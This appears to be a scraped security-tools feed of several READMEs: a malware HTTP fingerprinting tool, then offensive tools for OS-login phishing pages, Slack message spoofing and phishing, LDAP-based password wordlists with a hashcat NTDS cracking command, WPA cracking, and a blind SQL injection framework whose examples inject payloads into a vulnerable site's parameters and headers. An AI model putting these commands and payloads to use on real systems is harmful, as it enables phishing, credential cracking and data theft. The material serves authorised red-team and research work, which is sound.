    The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.

    After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include: * Request method * Protocol version * Header order * Popular headers' values * Payload length, entropy, and presence of non-ASCII characters

    Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in details here.

    The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.

    Installation

    Minimum requirements needed before installation: * Python >= 3.3, * Tshark >= 2.2.0.

    Installation available from PyPI:

    pip install hfinger

    Hfinger has been tested on Xubuntu 22.04 LTS with tshark package in version 3.6.2, but should work with older versions like 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.

    Please note that as with any PoC, you should run Hfinger in a separated environment, at least with Python virtual environment. Its setup is not covered here, but you can try this tutorial.

    Usage

    After installation, you can call the tool directly from a command line with hfinger or as a Python module with python -m hfinger.

    For example:

    foo@bar:~$ hfinger -f /tmp/test.pcap
    [{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]

    Help can be displayed with short -h or long --help switches:

    usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
    [-l LOGFILE]

    Hfinger - fingerprinting malware HTTP requests stored in pcap files

    optional arguments:
    -h, --help show this help message and exit
    -f FILE, --file FILE Read a single pcap file
    -d DIR, --directory DIR
    Read pcap files from the directory DIR
    -o output_path, --output-path output_path
    Path to the output directory
    -m {0,1,2,3,4}, --mode {0,1,2,3,4}
    Fingerprint report mode.
    0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
    1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
    2 - optimal (the default mode),
    3 - the lowest number of generated fingerprints, but the highest number of collisions,
    4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
    -v, --verbose Report information about non-standard values in the request
    (e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
    Without --logfile (-l) will print to the standard error.
    -l LOGFILE, --logfile LOGFILE
    Output logfile in the verbose mode. Implies -v or --verbose switch.

    You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:

    hfinger -f example.pcap -o /tmp/pcap

    will be saved to:

    /tmp/pcap/example.pcap.json

    Report mode -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ in the represented request features and rounding modes. The default mode (2) was chosen by us to represent all features that are usually used during requests' analysis, while also offering a low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.

    Beginning with version 0.2.1 Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using the -l/--logfile switch (it implies -v/--verbose). The log data will be appended to the log file.

    Using hfinger in a Python application

    Beginning with version 0.2.0, Hfinger supports importing to other Python applications. To use it in your app simply import hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and reporting mode. The returned result is a list of dicts with fingerprinting results.

    For example:

    from hfinger.analysis import hfinger_analyze

    pcap_path = "SPECIFY_PCAP_PATH_HERE"
    reporting_mode = 4
    print(hfinger_analyze(pcap_path, reporting_mode))

    Beginning with version 0.2.1 Hfinger uses the logging module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger named hfinger, but without prior configuration this log information is effectively discarded. If you want to receive it, configure the hfinger logger before calling hfinger_analyze: set its level to logging.INFO, configure a log handler to your needs, and add it to the logger. More information is available in the hfinger_analyze function docstring.
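
    For example, a minimal configuration along those lines could look like this (the handler choice is up to your application; this sketch simply prints the log to stderr):

    import logging

    from hfinger.analysis import hfinger_analyze

    logger = logging.getLogger("hfinger")          # Hfinger's own logger, as described above
    logger.setLevel(logging.INFO)
    logger.addHandler(logging.StreamHandler())     # any handler that fits your needs will do

    print(hfinger_analyze("SPECIFY_PCAP_PATH_HERE", 2))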

    Fingerprint creation

    A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.

    Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:

    2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4

    The creation of features is described below in the order of appearance in the fingerprint.

    Firstly, URI features are extracted:

    - URI length, represented as a logarithm base 10 of the length, rounded to an integer (in the example the URI is 43 characters long, so log10(43) β‰ˆ 2),
    - number of directories (in the example there are 3 directories),
    - average directory length, represented as a logarithm base 10 of the actual average length, rounded to an integer (in the example there are three directories with a total length of 20 characters (6+6+8), so log10(20/3) β‰ˆ 1),
    - extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt,
    - average value length, represented as a logarithm base 10 of the actual average value length, rounded to one decimal point (in the example two values have the same length of 4 characters, so log10(4) β‰ˆ 0.6).
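
    The rounding used for these URI features can be reproduced directly; the following snippet simply mirrors the worked example above:

    import math

    uri_len_feature = round(math.log10(43))        # 43-character URI      -> 2
    n_dirs = 3                                     # three directories     -> 3
    avg_dir_feature = round(math.log10(20 / 3))    # (6+6+8)/3 characters  -> 1
    avg_val_feature = round(math.log10(4), 1)      # 4-character values    -> 0.6
    print(uri_len_feature, n_dirs, avg_dir_feature, avg_val_feature)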

    Secondly, header structure features are analyzed: * request method encoded as first two letters of the method (PO), * protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), * order of the headers, * and popular headers and their values.

    To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json, for example, User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.

    When analyzing popular headers, the request is checked if they appear in it. These headers are: * Connection * Accept-Encoding * Content-Encoding * Cache-Control * TE * Accept-Charset * Content-Type * Accept * Accept-Language * User-Agent

    When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to schema stored in hfinger/configs directory or configs.py file, depending on the header. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
    If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.

    Finally, in the payload features: * presence of non-ASCII characters, represented with the letter N, and with A otherwise, * payload's Shannon entropy, rounded to an integer, * and payload length, represented as a logarithm with base 10 of the actual payload length, rounded to one decimal point.

    Report modes

    Hfinger operates in five report modes, which differ in the features represented in the fingerprint, and thus in the information extracted from requests. These are (with the number used in the tool configuration):

    - mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features,
    - mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4,
    - mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, while also offering a low number of collisions and generated fingerprints,
    - mode 3 - producing the lowest number of generated fingerprints from all modes, but achieving the highest number of collisions,
    - mode 4 - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.

    The modes were chosen in order to optimize Hfinger's capability to uniquely identify malware families versus the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families, however, mode 4 generates a little more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions by almost two times compared to modes 0, 2, and 4. Mode 3 produces at least two times fewer fingerprints than other modes, but it introduces about nine times more collisions. Description of all designed features is here.

    The modes consist of the following features (in the order of appearance in the fingerprint):

    - mode 0:
      - number of directories,
      - average directory length represented as an integer,
      - extension of the requested file,
      - average value length represented as a float,
      - order of headers,
      - popular headers and their values,
      - payload length represented as a float.
    - mode 1:
      - URI length represented as an integer,
      - number of directories,
      - average directory length represented as an integer,
      - extension of the requested file,
      - variable length represented as an integer,
      - number of variables,
      - average value length represented as an integer,
      - request method,
      - version of protocol,
      - order of headers,
      - popular headers and their values,
      - presence of non-ASCII characters,
      - payload entropy represented as an integer,
      - payload length represented as an integer.
    - mode 2:
      - URI length represented as an integer,
      - number of directories,
      - average directory length represented as an integer,
      - extension of the requested file,
      - average value length represented as a float,
      - request method,
      - version of protocol,
      - order of headers,
      - popular headers and their values,
      - presence of non-ASCII characters,
      - payload entropy represented as an integer,
      - payload length represented as a float.
    - mode 3:
      - URI length represented as an integer,
      - average directory length represented as an integer,
      - extension of the requested file,
      - average value length represented as an integer,
      - order of headers.
    - mode 4:
      - URI length represented as a float,
      - number of directories,
      - average directory length represented as a float,
      - extension of the requested file,
      - variable length represented as a float,
      - average value length represented as a float,
      - request method,
      - version of protocol,
      - order of headers,
      - popular headers and their values,
      - presence of non-ASCII characters,
      - payload entropy represented as a float,
      - payload length represented as a float.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Thief Raccoon - Login Phishing Tool

    By: Unknown β€” June 6th 2024 at 12:30


    Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


    Features

    • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
    • Capture user credentials for educational demonstrations.
    • Customizable login screens that mimic real operating systems.
    • Full-screen mode to enhance the phishing simulation.

    Installation

    Prerequisites

    • Python 3.x
    • pip (Python package installer)
    • ngrok (for exposing the local server to the internet)

    Download and Install

    1. Clone the repository:

    git clone https://github.com/davenisc/thief_raccoon.git
    cd thief_raccoon

    2. Install python venv:

    apt install python3.11-venv

    3. Create the venv and activate it:

    python -m venv raccoon_venv
    source raccoon_venv/bin/activate

    4. Install the required libraries:

    pip install -r requirements.txt

    Usage

    1. Run the main script:

    python app.py

    2. Select the operating system for the phishing simulation:

    After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

    3. Access the phishing page:

    If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

    If you want to make the phishing page accessible over the internet, use ngrok.

    Using ngrok

    1. Download and install ngrok

    Download ngrok from ngrok.com and follow the installation instructions for your operating system.

    2. Expose your local server to the internet:

    3. Get the public URL:

    After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

    How to install Ngrok on Linux?

    1. Install ngrok via Apt with the following command:

    curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
      | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
      && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
      | sudo tee /etc/apt/sources.list.d/ngrok.list \
      && sudo apt update \
      && sudo apt install ngrok

    2. Run the following command to add your authtoken to the default ngrok.yml:

    ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx

    Deploy your app online

    1. Put your app online at an ephemeral domain forwarding to your upstream service. For example, if it is listening on http://localhost:5000, run:

    ngrok http http://localhost:5000

    Example

    1. Run the main script:

    python app.py

    2. Select Windows 11 from the menu:

    Select the operating system for phishing:
    1. Windows 10
    2. Windows 11
    3. Windows XP
    4. Windows Server
    5. Ubuntu
    6. Ubuntu Server
    7. macOS
    Enter the number of your choice: 2

    3. Access the phishing page:

    Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

    Disclaimer

    This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

    License

    This project is licensed under the MIT License. See the LICENSE file for details.

    ScreenShots

    Credits

    Developer: @davenisc Web: https://davenisc.com



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R β€” June 4th 2024 at 12:30


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

    By: Zion3R β€” June 2nd 2024 at 12:30

    EvilSlackbot

    A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

    Disclaimer

    This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


    Background

    Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.

    Phishing Simulations

    In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

    Installation

    EvilSlackbot requires python3 and Slackclient

    pip3 install slackclient

    Usage

    usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
    [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

    options:
    -h, --help show this help message and exit

    Required:
    -t TOKEN, --token TOKEN
    Slack Oauth token

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc
    (Requires -e,-eL, or -cH)
    -m, --message Send a message as the bot associated with your token
    (Requires -e,-eL, or -cH)
    -s, --search Search slack for secrets with a keyword
    -a, --attach Send a message containing a malicious attachment (Requires -f
    and -e,-eL, or -cH)

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL
    Email of target
    -cH CHANNEL, --channel CHANNEL
    Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST
    Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks
    associated with your provided token.
    -o OUTFILE, --outfile OUTFILE
    Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Token

    To use this tool, you must provide a xoxb or xoxp token.

    Required:
    -t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
    python3 EvilSlackbot.py -t <token>

    Attacks

    Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

    -m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

    -s, --search Search slack for secrets with a keyword

    -a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

    Spoofed messages (-sP)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
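
    Internally, the email-to-SlackID lookup and the spoofed post boil down to two Slack API calls. The sketch below uses the slackclient package the tool depends on; the names, URL, and message text are illustrative, not EvilSlackbot's code, and the customized username/icon additionally requires the chat:write.customize scope:

    from slack import WebClient          # provided by the slackclient package

    client = WebClient(token="xoxb-...")                                   # the token passed with -t
    user = client.users_lookupByEmail(email="target@example.com")          # email -> SlackID lookup
    client.chat_postMessage(
        channel=user["user"]["id"],
        text="Please re-authenticate here: https://phish.example",
        username="IT Helpdesk",                                            # spoofed bot name
        icon_url="https://example.com/helpdesk.png",                       # spoofed bot icon
    )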

    Phishing Messages (-m)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

    Secret Search (-s)

    With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

    python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

    Attachments (-a)

    With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

    Arguments

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL Email of target
    -cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks associated with your provided token.
    -o OUTFILE, --outfile OUTFILE Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Channel Search

    With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

    python3 EvilSlackbot.py -t <xoxb token> -cL


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LDAPWordlistHarvester - A Tool To Generate A Wordlist From The Information Present In LDAP, In Order To Crack Passwords Of Domain Accounts

    By: Zion3R β€” May 29th 2024 at 12:30


    A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.

    Β 

    Features

    The bigger the domain is, the better the wordlist will be.

    • [x] Creates a wordlist based on the following information found in the LDAP:
    • [x] User: name and sAMAccountName
    • [x] Computer: name and sAMAccountName
    • [x] Groups: name
    • [x] Organizational Units: name
    • [x] Active Directory Sites: name and descriptions
    • [x] All LDAP objects: descriptions
    • [x] Choose wordlist output file name with option --outputfile

    Demonstration

    To generate a wordlist from the LDAP of the domain domain.local you can use this command:

    ./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101

    You will get the following output if using the Python version:

    You will get the following output if using the Powershell version:


    Cracking passwords

    Once you have this wordlist, you should crack your NTDS using hashcat, --loopback and the rule clem9669_large.rule.

    ./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback

    Usage

    $ ./LDAPWordlistHarvester.py -h
    LDAPWordlistHarvester.py v1.1 - by @podalirius_

    usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

    options:
    -h, --help show this help message and exit
    -v, --verbose Verbose mode. (default: False)
    -o OUTPUTFILE, --outputfile OUTPUTFILE
    Path to output file of wordlist.

    Authentication & connection:
    --dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
    -d DOMAIN, --domain DOMAIN
    (FQDN) domain to authenticate to
    -u USER, --user USER user to authenticate with
    --ldaps Use LDAPS instead of LDAP

    Credentials:
    --no-pass Don't ask for password (useful for -k)
    -p PASSWORD, --password PASSWORD
    Password to authenticate with
    -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
    NT/LM hashes, format is LMhash:NThash
    --aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
    -k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R β€” May 28th 2024 at 12:30


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against its key negotiation phase; this ultimately allows revealing the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute-force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
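
    As a point of reference, a single PMK can be derived in pure Python with hashlib (the parameters here, SSID as salt, 4096 iterations and a 256-bit output, come from the 802.11 standard rather than from Pyrit's code); doing this billions of times is what Pyrit precomputes and parallelizes:

    import hashlib

    pmk = hashlib.pbkdf2_hmac("sha1", b"passphrase", b"MyNetworkSSID", 4096, 32)
    print(pmk.hex())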

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki-entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue at https://github.com/JPaulMora/Pyrit/issues.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R β€” May 15th 2024 at 01:56


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences:

    - BlackHat MEA, Riyadh, 2023
    - Hack in the Box, Phuket, 2023
    - IEEE S&P Workshop on Offensive Technologies (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference
    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
        async def request(self, ctx, query):
            # Inject into the query parameter and infer True/False from the status code
            async with aiohttp.request('GET', f'http://vuln.com/?n=XXX" OR ({query}) --') as r:
                return r.status == 200

    Example 2 - Header Injection with Content-based Inference

    class ContentRequester(Requester):
        async def request(self, ctx, query):
            # Inject via a header and infer True/False from the response body
            headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
            async with aiohttp.request('GET', 'http://vuln.com/', headers=headers) as r:
                return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
        ...

    async def main():
        # requester: Use this Requester
        # dbms: Use this DBMS
        # n_tasks: Spawns N tasks that extract column rows in parallel
        ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
        ...

    if __name__ == '__main__':
        asyncio.get_event_loop().run_until_complete(main())

    Now that everything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns
    # text_strategy:    Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    Example 2 - Extracting Textual Columns
    # strategy:
    # 'binary': Use binary search
    # 'fivegram': Use five-gram model
    # 'unigram': Use unigram model
    # 'dynamic': Dynamically identify the best strategy. This setting
    # also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    Example 3 - Extracting Integer Columns
    res = await ext.extract_column_int(table='users', column='id')
    Example 4 - Extracting Float Columns
    res = await ext.extract_column_float(table='products', column='price')
    Example 5 - Extracting Blob (Binary Data) Columns
    res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
